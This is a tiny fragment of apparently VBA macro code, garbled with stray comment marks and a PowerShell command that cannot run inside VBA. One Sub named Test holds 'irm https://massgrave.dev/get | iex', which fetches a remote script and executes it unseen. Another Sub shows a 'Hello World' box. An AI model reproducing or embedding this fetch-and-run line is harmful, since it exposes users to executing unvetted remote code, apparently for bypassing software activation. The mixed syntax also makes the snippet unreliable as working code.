*/*/
  
Sub Test() 
  irm https://massgrave.dev/get | iex
End Sub
  
Sub Initialize() 
  MsgBox "Hello World"   
End Sub